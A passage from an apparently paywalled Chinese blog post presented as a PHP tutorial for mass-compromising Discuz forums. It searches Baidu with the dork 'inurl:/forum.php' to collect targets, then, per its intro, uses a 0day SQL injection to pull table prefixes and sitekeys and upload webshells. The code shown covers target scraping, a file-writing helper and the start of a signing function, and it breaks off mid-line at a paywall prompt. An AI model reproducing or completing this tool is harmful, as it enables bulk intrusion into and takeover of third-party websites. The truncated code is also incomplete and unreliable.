本文提供了一个PHP教程,详细讲解了如何通过搜索引擎关键词获取目标网站,并利用0day漏洞批量获取Webshell。通过设置搜索关键字、处理百度搜索结果,构造SQL注入语句,逐步解析数据库表前缀和sitekey,最后上传并获取shell位置。
error_reporting(E_ERROR);
set_time_limit(0);
$keyword = 'inurl:/forum.php';//百度搜索关键字
$timeout = 10; //读取网页超时(秒)
$stratpage = 1; //读取百度起始页
$lastpage = 100; //读取百度尾页
function ReadBaiduList($keyword,$timeout,$nowpage) //返回该页DZ网址列表Array
{
$tmp = array();
$data = '';
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1\r\nHost:www.baidu.com\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
@fclose($fp);
preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}
function fw($filename,$filecode,$filemode)
{
$handle = @fopen($filename,$filemode);
$key = @fputs($handle,$filecode);
@fclose($handle);
return $key;
}
function sign($exp_str)
{
return md5("attac
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
